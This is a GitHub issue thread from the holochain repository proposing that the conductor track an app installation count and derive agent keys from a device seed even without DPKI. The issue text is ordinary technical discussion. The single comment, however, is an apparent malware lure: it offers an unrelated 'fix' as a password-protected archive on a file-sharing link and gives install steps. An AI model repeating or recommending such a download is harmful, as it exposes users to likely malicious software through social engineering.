### ISSUE TITLE
Add app installation count to conductor state and always derive keys using device seed

### ISSUE THREAD

**Issue by abe-njama** [holochain/holochain#4217]
Installing apps with public keys derived from a device seed is currently assumed to be independent of DeepKey DNA usage. However, Holochain does not derive keys from a device seed if DPKI is disabled. To ensure that keys can still be derived from root/device seeds during launcher setup, Holochain needs to keep track of some derivation info even in the absence of DPKI -- namely, the number of apps ever installed, so that new keys can be derived for new app installations. Without this, users might be unable to recover their HF accounts if a device is lost. 

The concern also extends to ensuring that current setups are "future-DPKI-proof", making sure this derivation info tracking works seamlessly if Holo starts with DPKI disabled but enables it at a later time. Considerations may be needed for the Holo-compatible version of the launcher to anticipate this future use.

[MM thread](https://chat.holochain.org/holo/pl/jroub3tpbfrh9mgrhzdjefsnnr)

- Holochain will keep track of total app installation count
- If you have a device seed lair tag in your conductor config, and you don't provide an agent key at app installation, holochain will derive a seed for you using the app installation count as derivation path
- If you don't have a device seed in your config and don't provide an agent key, installation will fail -> you have to call GenerateAgentPubKey yourself to get a random one and pass that into InstallApp

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
